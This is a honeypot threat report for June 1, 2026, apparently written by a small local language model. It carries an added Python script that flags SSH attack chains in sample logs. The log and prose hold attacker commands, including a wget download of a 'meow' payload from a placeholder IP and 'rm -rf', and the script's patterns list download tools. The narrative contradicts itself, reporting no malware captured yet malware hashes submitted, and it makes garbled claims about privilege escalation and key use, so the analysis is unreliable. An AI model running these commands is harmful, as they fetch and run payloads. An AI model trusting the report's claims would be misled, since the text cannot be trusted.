Honeypot Threat Analysis — June 1, 2026
Critical threat level — massive coordinated attack activity across all honeypot services.
Threat Landscape Overview
As of today’s data update, our Raspberry Pi 5 honeypot lab has been monitoring for over a month. The activity level is critical, with an ongoing influx of connections and attempts from various IP addresses across multiple protocols.
The severity remains high due to the constant presence of sophisticated attacks aimed at exploiting vulnerabilities in SSH, Telnet, FTP, MySQL, Redis, VNC, and Git servers. We have also noted 71 instances of fake AWS keys/SSH keys being used by attackers, indicating a significant effort on their part to evade detection.
Geographic Analysis
The primary attack sources are the United States (22%), China (16%), Germany (12%), Belgium (11%), Romania (6%), Netherlands (6%), Taiwan (3%), Sweden (3%), and India (3%). This distribution reflects a globally distributed threat landscape, with sources showing varying degrees of sophistication in their attacks.
SSH Brute Force Analysis
SSH connections have been attempted 312 times, with 248 login attempts. The attackers are targeting common admin credentials like “admin” and “root”, frequently paired with the default password “0”. Additionally, they frequently use base64-encoded strings to bypass simple authentication checks.
Post-authentication commands include attempting to execute various administrative tasks such as whoami, checking operating system details with uname -s -m, accessing temporary directories (cd /tmp), setting up resource limits (ulimit -n 1020000), and deleting files (rm -rf meow*). They also attempt to download a suspicious file named “meow” from an IP address we suspect is part of a botnet operation.
Post-Exploitation Behavior
The attackers have been looking for administrative accounts across the system. They’ve used whoami and base64-encoded strings to bypass authentication checks, indicating they are not satisfied with weak passwords or known vulnerabilities. Once in, they’ve attempted to change default passwords (chpasswd) and escalated privileges by setting up a resource limit for a temporary directory.
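The SSH brute-force and post-exploitation sections above describe a recognisable pattern: credential guessing with “admin”/“root” and the password “0”, followed by whoami, uname -s -m, cd /tmp, ulimit -n, rm -rf meow*, and a download of “meow”. The following added example (not part of the original report, and not the lab’s own tooling) shows how a defender can turn that description into detection logic over honeypot logs. It assumes a Cowrie-style JSON-lines format with eventid/session/src_ip/username/password/input fields; the report does not name its SSH honeypot, so that schema, the sample events, and the RFC 5737 test addresses are all constructed for illustration.

```python
import json
import re
from collections import Counter

# Constructed sample log in a Cowrie-style JSON-lines format (assumption: the
# sensor's field names match Cowrie's; addresses are RFC 5737 documentation IPs).
SAMPLE_LOG = """\
{"eventid": "cowrie.session.connect", "session": "a1", "src_ip": "198.51.100.7"}
{"eventid": "cowrie.login.failed", "session": "a1", "src_ip": "198.51.100.7", "username": "admin", "password": "0"}
{"eventid": "cowrie.login.failed", "session": "a1", "src_ip": "198.51.100.7", "username": "root", "password": "0"}
{"eventid": "cowrie.login.success", "session": "a1", "src_ip": "198.51.100.7", "username": "root", "password": "root"}
{"eventid": "cowrie.command.input", "session": "a1", "src_ip": "198.51.100.7", "input": "whoami"}
{"eventid": "cowrie.command.input", "session": "a1", "src_ip": "198.51.100.7", "input": "uname -s -m"}
{"eventid": "cowrie.command.input", "session": "a1", "src_ip": "198.51.100.7", "input": "cd /tmp; ulimit -n 1020000; rm -rf meow*"}
{"eventid": "cowrie.command.input", "session": "a1", "src_ip": "198.51.100.7", "input": "wget http://203.0.113.9/meow -O meow"}
{"eventid": "cowrie.session.connect", "session": "b2", "src_ip": "203.0.113.42"}
{"eventid": "cowrie.login.failed", "session": "b2", "src_ip": "203.0.113.42", "username": "admin", "password": "admin"}
{"eventid": "cowrie.session.connect", "session": "c3", "src_ip": "192.0.2.15"}
{"eventid": "cowrie.login.success", "session": "c3", "src_ip": "192.0.2.15", "username": "root", "password": "0"}
{"eventid": "cowrie.command.input", "session": "c3", "src_ip": "192.0.2.15", "input": "uname -a"}
"""

# Stages of the post-authentication chain described in the report. Each pattern
# is applied to one shell command after chained input has been split apart.
STAGE_PATTERNS = {
    "recon": re.compile(r"^\s*(whoami|uname)\b"),
    "staging_dir": re.compile(r"^\s*cd\s+/tmp\b"),
    "raise_fd_limit": re.compile(r"^\s*ulimit\s+-n\b"),
    "cleanup": re.compile(r"^\s*rm\s+-rf\b"),
    "download": re.compile(r"^\s*(wget|curl|tftp)\b"),
}
# Separators attackers use to chain several commands into one input line.
SPLIT_RE = re.compile(r"\s*(?:;|&&|\|\||\|)\s*")
LOGIN_EVENTS = ("cowrie.login.failed", "cowrie.login.success")


def parse_events(text):
    """Parse JSON lines into event dicts, skipping blank or malformed lines."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            events.append(json.loads(line))
        except json.JSONDecodeError:
            continue  # a truncated line should not abort the whole report
    return events


def summarize_logins(events, top_n=3):
    """Connection and login counts plus the most-tried usernames and passwords."""
    logins = [e for e in events if e.get("eventid") in LOGIN_EVENTS]
    return {
        "connections": sum(1 for e in events if e.get("eventid") == "cowrie.session.connect"),
        "login_attempts": len(logins),
        "top_usernames": Counter(e["username"] for e in logins).most_common(top_n),
        "top_passwords": Counter(e["password"] for e in logins).most_common(top_n),
    }


def session_stages(events):
    """Map each session to its source IP and the set of chain stages it hit."""
    sessions = {}
    for e in events:
        if e.get("eventid") != "cowrie.command.input":
            continue
        info = sessions.setdefault(e["session"], {"src_ip": e["src_ip"], "stages": set()})
        for cmd in SPLIT_RE.split(e["input"]):
            for stage, pattern in STAGE_PATTERNS.items():
                if pattern.search(cmd):
                    info["stages"].add(stage)
    return sessions


def flag_sessions(events, min_stages=3):
    """Sessions that fetch a payload or hit at least min_stages of the chain."""
    flagged = []
    for sid, info in session_stages(events).items():
        if "download" in info["stages"] or len(info["stages"]) >= min_stages:
            flagged.append((sid, info["src_ip"], sorted(info["stages"])))
    return flagged


def ips_for_reporting(events):
    """Two tiers: every source IP seen, and those whose sessions ran the chain."""
    all_ips = sorted({e["src_ip"] for e in events if "src_ip" in e})
    high = sorted({ip for _, ip, _ in flag_sessions(events)})
    return {"all": all_ips, "high_confidence": high}


if __name__ == "__main__":
    evs = parse_events(SAMPLE_LOG)
    print(summarize_logins(evs))
    for sid, ip, stages in flag_sessions(evs):
        print(f"session {sid} from {ip}: {', '.join(stages)}")
    print(ips_for_reporting(evs))
```

The two-tier output mirrors the report’s community-defense step: every source IP can go to the block lists, while sessions that completed the recon/staging/download chain are the ones worth a higher-confidence report and a closer look at the fetched sample. Splitting chained input before matching matters because a single “cd /tmp; ulimit -n 1020000; rm -rf meow*” line would otherwise count as one stage instead of three.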
Web Scanner Activity
87 HTTP requests were observed, alongside activity on the FTP, Telnet, MySQL, Redis, VNC, and Git services. The primary targets seem to be websites related to web application testing or file transfer services like Git and VNC.
Malware Captures
No malware has been captured via the SSH tunneling today, suggesting the honeypot is functioning effectively at this time.
SSH Tarpit (Endlessh)
The tarpit was not active during today’s monitoring period, so no attackers were trapped and no attacker resources were wasted attempting to access our server remotely through an open port on the Raspberry Pi 5.
Canarytoken Alerts
No canarytokens were triggered by any of the attackers, indicating they did not use fake credentials planted in the honeypot for further exploitation.
Community Defense
All identified IPs have been reported to AbuseIPDB, AlienVault OTX, Blocklist.de, and SANS DShield. The malware hashes submitted to VirusTotal and OTX provide evidence that these attacks are real and pose a significant threat to network security.
Conclusion
Honeypot Infra
Our Raspberry Pi 5 honeypot is located in Spain, running open-source tools to monitor incoming traffic from a wide variety of IP addresses across multiple protocols. This setup allows us to detect sophisticated attacks before they can cause any damage and provides valuable data for threat intelligence purposes.
Stay tuned for future updates as our honeypot continues to evolve and improve its ability to protect against the latest cyber threats.
This analysis was generated by qwen2.5:1.5b running locally on the Raspberry Pi 5 honeypot lab. All data comes from real attacks captured in the last 24 hours. View the raw data report for complete metrics.